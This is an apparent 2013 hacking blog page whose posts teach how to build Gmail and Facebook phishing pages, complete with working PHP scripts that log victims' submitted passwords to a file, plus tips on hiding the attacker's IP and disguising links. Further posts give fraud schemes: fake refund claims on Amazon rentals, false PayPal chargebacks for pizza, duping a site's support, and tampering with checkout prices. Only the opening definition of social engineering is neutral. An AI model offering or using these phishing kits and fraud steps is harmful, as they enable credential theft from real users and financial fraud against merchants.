Monday, February 11, 2013

Social Engineering

What is Social Engineering?

Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.


"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker.
Posted by at

Gmail hacking

Gmail Hacked
 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:

Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url
Posted by at

Facebook Phisher

Facebook Phisher 

My readers use to ask how to hack Facebook accounts.  Most of the people curious to know how hackers take control of their accounts.  In this post, let me clarify those doubts.

Here, i am going to explain one of the popular social engineering attack(luring user into do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.

Step 1:
To make a fake page of the target website , You can simply the source code of the website and save as html page.   In our case , it is facebook.  Go to facebook and right click on website .  Select "View source" and copy the code to notepad.


Step2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:



Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form(In our case, login-form) is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "login.php"

Step 4:
Open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 

Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.
Posted by at

Saturday, February 9, 2013

Share cash premium account


How to get a FREE ShareCash Premium Account.

I bet most of you here have heard of Share Cash.org right?

Here is how to avoid completing surveys on their site.
 This following method has worked numerous times.
Send an email to admin@share cash.org with something like this- Hello, I am just writing this email to bring attention to the faulty survey system, I have tried multipul times to unlock a simple .01kb file, and failed, nearly 2 hours wasted.
I have now signed up to over 20 different product mailing lists, entered my phone for multiple billing services and completed numerous surveys, but still my download is still locked.
It unlocked once, but my browser immediated blocked the download.
Regards. If it worked correctly, he will reply back to your email with a free 2 Day Premium Account. Enjoy!
 Have fun downloading some fake generators.
Posted by at

Amazon pirated


How to watch a movie on www.amazon.com for FREE This is really simple...
All you need is an Amazon account with at least $5 balance.
1. Go to http://www.amazon.com
 
2. Sign it your account.

3. Watch a movie on Amazon (1 day rental)

4. After it is done and the money has been deducted from your amazon account, contact support.

5. Tell their support that you accidentally clicked on the movie and didn't want to rent it. Ask them for a refund of the rental to your account.

6. They should respond with 2 days and the refunded amount should be in your account. (I'm not sure how many times you can do this on a single account before they catch on.)

So Try creating multiple accounts :D
Posted by at

Free pizza online


How To Get Free Dominos Pizzas Want free pizza? Read below...
You need PayPal and you also need to be in a place that Dominos deliver to.

1. Go to http://www.dominos.co.uk/Default.aspx

2. Order a pizza.

3. Receive the pizza.

4. Take pictures of your pizza and post them here.

5. Go to PayPal.

6. Dispute the payment. (Say that the pizza never arrived or say that the pizza was cold. They can't prove you wrong.)

7. Eat your pizza and wait for your payment to be reversed.
Posted by at

Free purchase

Get anything on amazon/paypal checkout for free

I'm not going to do this and never have done it because it is illegal and unethical but it is possible to get anything on paypal checkout or amazon.com for free using tamper data, a firefox addon.

You basically edit the website's code to make the price of the item 0 bucks, or one cent.

No money (or a penny) is actually being sent to the seller so you can see why you're better off legally buying hong kong ass penny auctions off ebay.

Here is a video showing it on PP checkout: http://www.youtube.com/watch?v=SbDAUHT5QdQ

I bet ninja remote above already caught on to this by now if people are actually doing exactly what the above guy did in that video.

Here is a video of it being done on amazon: http://www.youtube.com/watch?v=u5Q_stLGoyc

This exploit is detectable because, like I said, no money is going in from you. Use at your own risk. This can also be used for other sites as well.

Posted by at
Subscribe to: Posts (Atom)